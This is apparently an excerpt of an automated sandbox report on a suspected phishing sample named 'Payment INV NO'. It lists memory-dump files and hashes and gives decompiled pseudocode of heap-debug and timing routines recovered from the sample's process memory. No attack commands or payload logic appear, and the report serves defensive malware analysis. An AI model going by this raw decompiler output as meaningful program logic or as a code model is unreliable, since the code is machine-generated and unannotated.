                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0$Flst
                                                          • API String ID: 0-758220159
                                                          • Opcode ID: 581fa8056974593e2b88bc34cfc57623d4eaa47b4c87bb67428433546c5083d2
                                                          • Instruction ID: d5e55fe38cd49046eedf6ed8f90b2eebbed6a31c0b68ffc4b2060388eac6991a
                                                          • Opcode Fuzzy Hash: 581fa8056974593e2b88bc34cfc57623d4eaa47b4c87bb67428433546c5083d2
                                                          • Instruction Fuzzy Hash: 7C4189B1A00648CFDF25CF99DA887AEFBF5EF44314F14802ED14A9B656D731994ACB80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017BB8E4 Relevance: 2.6, Strings: 2, Instructions: 69COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 60%
                                                          			E017BB8E4(unsigned int __edx) {
				void* __ecx;
				void* __edi;
				intOrPtr* _t16;
				intOrPtr _t18;
				void* _t27;
				void* _t28;
				unsigned int _t30;
				intOrPtr* _t31;
				unsigned int _t38;
				void* _t39;
				unsigned int _t40;

				_t40 = __edx;
				_t39 = _t28;
				if( *0x1888748 >= 1) {
					__eflags = (__edx + 0x00000fff & 0xfffff000) - __edx;
					if((__edx + 0x00000fff & 0xfffff000) != __edx) {
						_t18 =  *[fs:0x30];
						__eflags =  *(_t18 + 0xc);
						if( *(_t18 + 0xc) == 0) {
							_push("HEAP: ");
							E0179B150();
						} else {
							E0179B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(0x178f8b4);
						E0179B150();
						__eflags =  *0x1887bc8;
						if(__eflags == 0) {
							L01852073(_t27, 1, _t39, __eflags);
						}
					}
				}
				_t38 =  *(_t39 + 0xb8);
				if(_t38 != 0) {
					_t13 = _t40 >> 0xc;
					__eflags = _t13;
					while(1) {
						__eflags = _t13 -  *((intOrPtr*)(_t38 + 4));
						if(_t13 <  *((intOrPtr*)(_t38 + 4))) {
							break;
						}
						_t30 =  *_t38;
						__eflags = _t30;
						if(_t30 != 0) {
							_t38 = _t30;
							continue;
						}
						_t13 =  *((intOrPtr*)(_t38 + 4)) - 1;
						__eflags =  *((intOrPtr*)(_t38 + 4)) - 1;
						break;
					}
					return E017BAB40(_t39, _t38, 0, _t13, _t40);
				} else {
					_t31 = _t39 + 0x8c;
					_t16 =  *_t31;
					while(_t31 != _t16) {
						__eflags =  *((intOrPtr*)(_t16 + 0x14)) - _t40;
						if( *((intOrPtr*)(_t16 + 0x14)) >= _t40) {
							return _t16;
						}
						_t16 =  *_t16;
					}
					return _t31;
				}
			}














                                                          0x017bb8f0
                                                          0x017bb8f2
                                                          0x017bb8f4
                                                          0x01802c4e
                                                          0x01802c50
                                                          0x01802c56
                                                          0x01802c5c
                                                          0x01802c60
                                                          0x01802c7f
                                                          0x01802c84
                                                          0x01802c62
                                                          0x01802c77
                                                          0x01802c7c
                                                          0x01802c8a
                                                          0x01802c8f
                                                          0x01802c94
                                                          0x01802c9c
                                                          0x01802ca5
                                                          0x01802ca5
                                                          0x01802c9c
                                                          0x01802c50
                                                          0x017bb8fa
                                                          0x017bb902
                                                          0x017bb921
                                                          0x017bb921
                                                          0x017bb924
                                                          0x017bb924
                                                          0x017bb927
                                                          0x00000000
                                                          0x00000000
                                                          0x017bb929
                                                          0x017bb92b
                                                          0x017bb92d
                                                          0x017bb940
                                                          0x00000000
                                                          0x017bb940
                                                          0x017bb932
                                                          0x017bb932
                                                          0x00000000
                                                          0x017bb932
                                                          0x00000000
                                                          0x017bb904
                                                          0x017bb904
                                                          0x017bb90a
                                                          0x017bb90c
                                                          0x017bb916
                                                          0x017bb919
                                                          0x017bb915
                                                          0x017bb915
                                                          0x017bb91b
                                                          0x017bb91b
                                                          0x00000000
                                                          0x017bb910

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP[%wZ]:
                                                          • API String ID: 0-3616360210
                                                          • Opcode ID: d9dd87dd89c60d913b48277730171b0831f1755ee9129bdb6f1bc1fd854ac9f7
                                                          • Instruction ID: 370c33d0cc5f4a0deebfe1e1d69af19678224a5c1ef65cec653c5d410f5a7a1e
                                                          • Opcode Fuzzy Hash: d9dd87dd89c60d913b48277730171b0831f1755ee9129bdb6f1bc1fd854ac9f7
                                                          • Instruction Fuzzy Hash: AB11D331344502DFEB29E719D4D8FB6F7A6EF90A20F158469E806CB255DB70D944C741
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017C513A Relevance: 1.8, APIs: 1, Instructions: 258timeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 67%
                                                          			E017C513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x188d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E017DD0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E017B2280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = E017B4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E017DF3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E017AFFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x188b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E017DB640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                                                          0x017c5142
                                                          0x017c514c
                                                          0x017c5150
                                                          0x017c5157
                                                          0x017c5159
                                                          0x017c515e
                                                          0x017c5165
                                                          0x017c5169
                                                          0x017c516c
                                                          0x017c5172
                                                          0x017c5176
                                                          0x017c517a
                                                          0x017c517a
                                                          0x017c517a
                                                          0x017c517f
                                                          0x01806d8b
                                                          0x01806d8e
                                                          0x01806d91
                                                          0x01806d95
                                                          0x01806d98
                                                          0x01806d9c
                                                          0x01806da0
                                                          0x01806da3
                                                          0x01806da7
                                                          0x01806e26
                                                          0x01806e26
                                                          0x01806e2a
                                                          0x017c51f9
                                                          0x017c51f9
                                                          0x017c51fe
                                                          0x01806e33
                                                          0x01806e33
                                                          0x01806e39
                                                          0x01806e3d
                                                          0x01806e46
                                                          0x01806e50
                                                          0x00000000
                                                          0x00000000
                                                          0x01806e52
                                                          0x01806e53
                                                          0x01806e56
                                                          0x01806e5d
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x01806e5f
                                                          0x01806e67
                                                          0x01806e77
                                                          0x01806e7f
                                                          0x01806e80
                                                          0x01806e88
                                                          0x01806e90
                                                          0x01806e9f
                                                          0x01806ea5
                                                          0x01806ea9
                                                          0x01806eb1
                                                          0x01806ebf
                                                          0x00000000
                                                          0x00000000
                                                          0x01806ecf
                                                          0x01806ed3
                                                          0x00000000
                                                          0x00000000
                                                          0x01806edb
                                                          0x01806ede
                                                          0x01806ee1
                                                          0x01806ee8
                                                          0x01806eeb
                                                          0x01806eed
                                                          0x01806ef0
                                                          0x01806ef4
                                                          0x01806ef8
                                                          0x01806efc
                                                          0x00000000
                                                          0x00000000
                                                          0x01806f0d
                                                          0x01806f11
                                                          0x01806f32
                                                          0x01806f37
                                                          0x01806f3b
                                                          0x01806f3e
                                                          0x01806f41
                                                          0x01806f46
                                                          0x00000000
                                                          0x00000000
                                                          0x01806f4c
                                                          0x01806f50
                                                          0x01806f50
                                                          0x01806f54
                                                          0x01806f62
                                                          0x01806f65
                                                          0x01806f6d
                                                          0x01806f7b
                                                          0x01806f7b
                                                          0x01806f93
                                                          0x01806f98
                                                          0x01806fa0
                                                          0x01806fa6
                                                          0x01806fb3
                                                          0x01806fb6
                                                          0x01806fbf
                                                          0x01806fc1
                                                          0x01806fd5
                                                          0x01806fda
                                                          0x01806fda
                                                          0x01806fdd
                                                          0x01806fe2
                                                          0x01806fe7
                                                          0x01806feb
                                                          0x01806fef
                                                          0x01806ff3
                                                          0x017c520c
                                                          0x017c520c
                                                          0x017c520f
                                                          0x017c5215
                                                          0x017c5234
                                                          0x017c523a
                                                          0x017c523a
                                                          0x017c5244
                                                          0x017c5245
                                                          0x017c5246
                                                          0x017c5251
                                                          0x017c5251
                                                          0x01806f13
                                                          0x01806f17
                                                          0x01806f17
                                                          0x01806f18
                                                          0x01806f1b
                                                          0x01806f1f
                                                          0x01806f23
                                                          0x00000000
                                                          0x01806f28
                                                          0x017c5204
                                                          0x017c5204
                                                          0x017c5208
                                                          0x00000000
                                                          0x017c5208
                                                          0x017c5185
                                                          0x017c5188
                                                          0x017c518a
                                                          0x017c518e
                                                          0x017c5195
                                                          0x01806db1
                                                          0x01806db5
                                                          0x01806db9
                                                          0x017c519b
                                                          0x017c519b
                                                          0x017c519e
                                                          0x017c51a7
                                                          0x017c51a9
                                                          0x017c51a9
                                                          0x017c51b5
                                                          0x017c51b8
                                                          0x017c51bb
                                                          0x017c51be
                                                          0x017c51c1
                                                          0x017c51c5
                                                          0x017c51c9
                                                          0x017c51cd
                                                          0x017c51cd
                                                          0x017c51d8
                                                          0x017c51dc
                                                          0x017c51e0
                                                          0x01806dcc
                                                          0x01806dd0
                                                          0x01806dd5
                                                          0x01806ddd
                                                          0x01806de1
                                                          0x01806de1
                                                          0x01806de5
                                                          0x01806deb
                                                          0x01806df1
                                                          0x01806df7
                                                          0x01806dfd
                                                          0x01806e01
                                                          0x01806e05
                                                          0x01806e09
                                                          0x01806e0d
                                                          0x01806e11
                                                          0x01806e11
                                                          0x017c51eb
                                                          0x01806e1a
                                                          0x01806e1f
                                                          0x01806e21
                                                          0x01806e23
                                                          0x00000000
                                                          0x017c51f1
                                                          0x017c51f1
                                                          0x00000000
                                                          0x017c51f1

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID:
                                                          • API String ID: 3446177414-0
                                                          • Opcode ID: 2e002dc3f8938fa51bdeee92d4d9a7b6c767455c59ec12ab86253056c20e373f
                                                          • Instruction ID: fa727d36daf7242deb01936c5d4436aeec9d6d98e9984e8b5b033f1ddbeef811
                                                          • Opcode Fuzzy Hash: 2e002dc3f8938fa51bdeee92d4d9a7b6c767455c59ec12ab86253056c20e373f
                                                          • Instruction Fuzzy Hash: 23C124756083818FD355CF28C980A5AFBF1BF88704F244A6EF9998B392D771E945CB42
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017BB944 Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 75%
                                                          			E017BB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				signed int _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x188d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t105 = __ecx[3];
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t60 =  *__ecx | __ecx[1];
					if(( *__ecx | __ecx[1]) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E017B7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							L01868CD6(_t112);
						}
						_push(0);
						_push( *((intOrPtr*)(_t112 + 0x10)));
						_t60 = E017D9E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E017DB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t67 = __ecx[2];
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E017DCE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E017B7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							L01868F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_push( *((intOrPtr*)(_t112 + 0x10)));
						_t60 = E017DAF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x1888628; // 0x0
								_v68 = _t77;
								_t78 =  *0x188862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
